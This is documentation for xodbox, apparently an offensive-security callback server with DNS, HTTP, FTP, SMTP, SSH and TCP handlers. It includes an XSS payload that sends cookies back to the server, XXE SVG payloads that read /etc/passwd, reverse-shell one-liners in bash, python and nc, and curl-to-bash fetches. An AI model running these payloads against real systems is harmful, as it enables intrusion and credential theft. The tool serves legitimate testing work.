Handlers are services that listen on ports and respond to requests.
This is the multi-page printable view of this section. Click here to print.
Handlers
Interaction handlers
- 1: DNS
- 2: FTP
- 3: HTTPX
- 3.1: Default Payloads Seeds
- 3.1.1: Default Header
- 3.1.2: Redirect
- 3.1.3: Robots TXT
- 3.1.4: Inspect
- 3.1.5: XSS HTML
- 3.1.6: XSS JavaScript
- 3.1.7: Default Favicon
- 3.1.8: HTML Iframe
- 3.1.9: Open Graph
- 3.1.10: XXE Callback
- 3.1.11: XXE DTD
- 3.1.12: XXE SVG Hostname
- 3.1.13: XXE SVG Passwd
- 3.1.14: XXE SVG Request Params
- 3.1.15: XXE System
- 3.1.16: Default Page
- 3.1.17: In Development Seeds
- 3.1.17.1: Build MDaaS
- 3.1.17.2: Bind Shell
- 3.1.17.3: BusyBox Reverse Shell
- 3.1.17.4: Detect platform
- 3.1.17.5: List Payloads
- 3.1.17.6: Reverse Shell
- 3.1.17.7: Simple SSH
- 3.1.17.8: Simple SSH Service
- 3.1.17.9: WPAD
- 3.2: Example Payloads
- 3.2.1: List Payloads
- 4: SMTP
- 5: SSH
- 6: TCP
1 - DNS
DNS Handler
In development feature
This feature is in development. Please help make it awesome by providing feedback on your experience using it.Purpose
Currently, this handler just returns a single IP address for every request. In the future, I’d like to be able to force specific DNS responses. Most should be possible using the subdomain. However, I think it would be easier to store records in the DB or config.
Configuration
| Key | Values |
|---|---|
| handler | Must be DNS |
| listener | Default :53 |
| default_ip | An IP address default will be whatever is detected as the server’s public IP. |
2 - FTP
FTP Handler
In development feature
This feature is in development. Please help make it awesome by providing feedback on your experience using it.Purpose
Speak FTP to other computers you may or may not control. Currently only list files, but I’d like to support uploads for exfil purposes.
Configuration
| Key | Values |
|---|---|
| handler | Must be FTP |
| listener | Default :21 |
| server_name | Default FTP Server |
| fake_dir_tree | Default test/old/fake,test/new/fake |
Additional Information
Things are still being created, documented, and fine-tuned.
3 - HTTPX
HTTPX Handler
Purpose
Speak HTTP to other computers you may or may not control….
Configuration
| Key | Values |
|---|---|
| handler | Must be HTTPX |
| listener | Default :80 |
| static_dir | Directory to host static files from |
| payload_dir | Directory to import payloads from |
| acme_email | Email to use for your ACME account |
| acme_accept | A dumb way to force you to ensure you agree to the ACME provider’s (Most likely Let’s Encrypt) TOS |
| acme_url | https://acme-staging-v02.api.letsencrypt.org/directory, https://acme-v02.api.letsencrypt.org/directory, or one of these: Certmagic acmeissuer.go |
| tls_names | Your domains to get TLS certificates for comma separated. I had to do wildcards first, not sure if that was a staging or dns provider issue. |
| dns_provider | Currently, namecheap or route53 but we can support anything libdns supports… |
| dns_provider_api_user | Username for API calls. Only used for namecheap ATM. |
| dns_provider_api_key | Key for API calls. Only used for namecheap ATM. |
Filters
The entire HTTP request is used to match filters. To alert on a specific prefix the following filter would be used.
"(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix"
This would match:
- https://test.example/myPrefixexample
- https://test.example/myPrefix/example
- https://test.example/myPrefix/asdasd/asdasd/asd/as/d
And would not match:
Additional Information
Things are still being created, documented, and fine-tuned.
New Features
- Let’s Encrypt Auto Cert
- Exfil data saver
Legacy Functionality to be implemented.
- robots.txt
- unfurly
- arbitrary json
- b64
- redirect
- b64
- basic auth
- breakfastbot
- allow origin *
Legacy functionality that isnt specific to a handler
- alert pattern with payload
- alert pattern (alert patterns are part of notifiers, maybe we need to expose alert patterns based on handler type)
- slack hook (this is now a notifier)
3.1 - Default Payloads Seeds
seed data
Default payloads that come with xodbox.
3.1.1 - Default Header
Adds the default header to all HTTP responses.
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
Server: BreakfastBot/1.0.0
3.1.2 - Redirect
HTTP Redirects
HTTP Redirects to the query parameter l using the query param s as the status code.
| What | Description | GET Parameters |
|---|---|---|
| Location | Location to redirect to | l |
| Status | HTTP status code | s |
Example Request
curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"
Example Response
Location: https://github.com/defektive/xodbox
3.1.3 - Robots TXT
A restrictive robots.txt
Simple robots txt to prevent indexing.
Example Request
curl http://xodbox.test/robots.txt
Example Response
User-Agent: *
Disallow: /
3.1.4 - Inspect
Reflect back HTTP requests in various formats
Depends on an internal code
/inspect
Inspect or reflect the request back in various formats.
- Plain Text (default, .txt)
- HTML (.html, .html)
- GIF (.gif)
- JPEG (.jpg)
- PNG (.png)
- MP4 (.mp4)
- XML (.xml)
- JSON (.json)
- Javascript (.js)
Examples
- http://localhost/inspect
- http://localhost/some/random/path/inspect.gif
3.1.5 - XSS HTML
Returns HTML that embeds xss-js
/jsc.html
Simple HTML to load simple JS Payload.
3.1.6 - XSS JavaScript
Returns JS that embeds an image back to xodbox
/jsc
Simple JS Payload. Useful form embedding or quickly copying and modifying for an XSS payload to prove execution and exfil.
(function (){
var s = document.createElement("img");
document.body.appendChild(s);
s.src="//{{.Request.Host}}/jscb?src="+window.location+"&c="+document.cookie;
})()
3.1.7 - Default Favicon
Redirects to the default logo.
Redirects to the embedded default logo, exposed via embedded fs.
Example Request
curl -i http://xodbox.test/favicon.ico
3.1.8 - HTML Iframe
HTML page with iframe and image callback
/ht
Iframe callback
3.1.9 - Open Graph
Embed request params in open graph elements.
Useful for unfurlers. Maybe we should merge this into inspect…
Example Request
curl -i "http://xodbox.test/unfurl"
Example Response
Location: https://github.com/defektive/xodbox
3.1.10 - XXE Callback
More XXE
XXE Callback used by xxe-system
3.1.11 - XXE DTD
More XXE
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
/evil.dtd
dtd for use by others
3.1.12 - XXE SVG Hostname
Returns an SVG payload with XXE to get files
/sh
attempts to get /etc/hostname
SVG with XXE payloads
3.1.13 - XXE SVG Passwd
Returns an SVG payload with XXE to get files
/sp
attempts to get /etc/passwd
3.1.14 - XXE SVG Request Params
Returns an SVG payload with XXE to get files
/sv
attempts to get whatever files is supplied via the f query parameter
3.1.15 - XXE System
More XXE
/dt
A vulnerable application for testing is in ../../../../cmd/xodbox-validator
3.1.16 - Default Page
returns a simple page if nothing is matched
Adds an HTTP header to all HTTP responses.
Example Request
curl -i http://xodbox.test/
Example Response
hi
3.1.17 - In Development Seeds
These seeds are not ready for production and may never be.
Seeds that are not tested or finished.
3.1.17.1 - Build MDaaS
Build random binaries
3.1.17.2 - Bind Shell
Requires bind-shell in static dir
curl xodbox/bind.sh|bash
3.1.17.3 - BusyBox Reverse Shell
BusyBox Reverse Shell
List Payloads
# bash
bash -i >& /dev/tcp/10.28.0.241/9091 0>&1
0<&196;exec 196<>/dev/tcp/10.28.0.241/9091; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.28.0.241/9091 0<&1 2>&1
#python
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.28.0.241",9091));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
#busybox nc
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.28.0.241 9092 >/tmp/f
3.1.17.4 - Detect platform
detect platform
3.1.17.5 - List Payloads
List payloads
3.1.17.6 - Reverse Shell
Requires bind-shell in static dir
3.1.17.7 - Simple SSH
Simple SSH (requires build of simple ssh server in static dir)
curl xodbox/ssh.sh|bash
3.1.17.8 - Simple SSH Service
Simple SSH Service (requires build of simple ssh server in static dir)
3.1.17.9 - WPAD
Returns a WPAD config file (Javascript).
WPAD Proxy. Not really useful at the moment. Should be more useful in the future
3.2 - Example Payloads
Examples
Default payloads that come with xodbox.
3.2.1 - List Payloads
List payloads
List Payloads
---
title: List Payloads
description: List payloads
weight: 1
pattern: /i-forgot-how-things-work$
is_final: true
data:
headers:
Content-Type: text/plain
body: |
Payloads
{{ range .Payloads }}
{{ .Pattern }} - {{ .Name }} [{{ .Type }}]
{{ .Description }}
{{ end }}
---
4 - SMTP
SMTP Handler
In development feature
This feature is in development. Please help make it awesome by providing feedback on your experience using it.Purpose
Speak SMTP to other computers you may or may not control….
Configuration
| Key | Values |
|---|---|
| handler | Must be SMTP |
| listener | Default :1587 |
Additional Information
Things are still being created, documented, and fine-tuned.
5 - SSH
SSH Handler
In development feature
This feature is in development. Please help make it awesome by providing feedback on your experience using it.Purpose
Speak SSH to other computers you may or may not control….
Configuration
| Key | Values |
|---|---|
| handler | Must be SSH |
| listener | Default :22 |
Additional Information
Things are still being created, documented, and fine-tuned.
6 - TCP
TCP Handler
In development feature
This feature is in development. Please help make it awesome by providing feedback on your experience using it.Purpose
Speak TCP…
Configuration
| Key | Values |
|---|---|
| handler | Must be TCP |
| listener | Default :9090 |
Additional Information
Things are still being created, documented, and fine-tuned.